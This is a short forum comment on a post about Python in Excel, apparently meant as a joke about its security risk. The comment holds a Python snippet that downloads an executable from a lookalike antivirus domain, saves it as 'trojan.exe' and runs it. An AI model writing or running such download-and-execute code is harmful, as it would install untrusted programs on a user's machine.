Comment on My thoughts on Python in Excel

30p87@feddit.de ⁨5⁩ ⁨months⁩ ago

import requests, os with open(“trojan.exe”, “wb”) as file: file.write(requests.get(“download.mcaffe.com/download.exe”).content) os.system(“start trojan.exe”)

source
Sort:hotnewtop